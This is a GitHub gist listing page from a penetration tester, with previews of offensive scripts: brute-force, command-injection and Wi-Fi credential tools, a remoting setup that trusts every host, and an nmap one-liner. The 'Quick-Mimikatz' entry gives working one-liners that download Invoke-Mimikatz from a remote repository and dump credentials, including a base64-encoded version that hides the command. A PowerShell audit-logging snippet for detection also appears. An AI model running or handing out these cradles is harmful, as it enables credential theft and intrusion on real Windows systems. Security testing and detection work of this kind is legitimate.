View Enable-PSRemoting.ps1
function enablePSRemoting { | |
Enable-PSRemoting –force | |
Set-Service WinRM -StartMode Automatic | |
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"} | |
Set-Item WSMan:localhost\client\trustedhosts -value * | |
Get-Item WSMan:\localhost\Client\TrustedHosts | |
} |
View auto-hydra.sh
#!/bin/bash | |
# | |
# @heinzarelli | |
# greg . foss [at] logrhythm . com | |
# v0.1 - May 2017 | |
# | |
function usage { | |
echo "" |
View Extract-WiFi-Creds.ps1
#====================================# | |
# Extract Wi-Fi Credentials # | |
# greg . foss @ owasp . org # | |
# v0.1 -- July, 2017 # | |
#====================================# | |
# Licensed under the MIT License | |
<# |
View say.ps1
function say { | |
param( [string]$comment = $_ ) | |
[Reflection.Assembly]::LoadWithPartialName('System.Speech') | Out-Null | |
$object = New-Object System.Speech.Synthesis.SpeechSynthesizer | |
$object.SelectVoiceByHints('Female') | |
$object.Speak("$comment") | |
} |
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
#mimikatz [local] | |
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
#encoded-mimikatz [local] | |
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ |
View PowerShell Command Line Logging
# PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
# For detecting dangerous PowerShell Commands/Functions | |
Log Source Type: | |
MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
Add this file to your PowerShell directory to enable verbose command line audit logging | |
profile.ps1 | |
$LogCommandHealthEvent = $true | |
$LogCommandLifeCycleEvent = $true |
View gist:70ae3df90c5a532baaf7
### Keybase proof | |
I hereby claim: | |
* I am gfoss on github. | |
* I am heinzarelli (https://keybase.io/heinzarelli) on keybase. | |
* I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E | |
To claim this, I am signing this object: |
View command injector
#!/bin/bash | |
# | |
# Command Injector v0.1 | |
# greg.foss[at]owasp.org | |
# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli | |
# dirtshell.sh => http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html | |
function usage { | |
echo "usage: -u URL" | |
echo "eg : -u \"http://site.com/index.php?cmd=\"" |
View autopeep.sh
#!/bin/bash | |
# | |
# Utilizing LaNMaSteR53's peepingtom.py script to auto-scrape web servers and send out notifications. | |
# Optimized for Kali Linux | |
# greg.foss[at]owasp.org | |
# | |
# cronjob to run this script once a week every Sunday at Midnight | |
# 0 0 * * 0 /usr/share/peepingtom/autopeep.sh | |
# prepare storage location, remove old data, and migrate existing folders |
View nmap-os-detection
$ sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt; echo "$(cat os.txt | grep Apple | wc -l) OS X devices"; echo "$(cat os.txt | grep Linux | wc -l) Linux devices"; echo "$(cat os.txt | grep Windows | wc -l) Windows devices" |
NewerOlder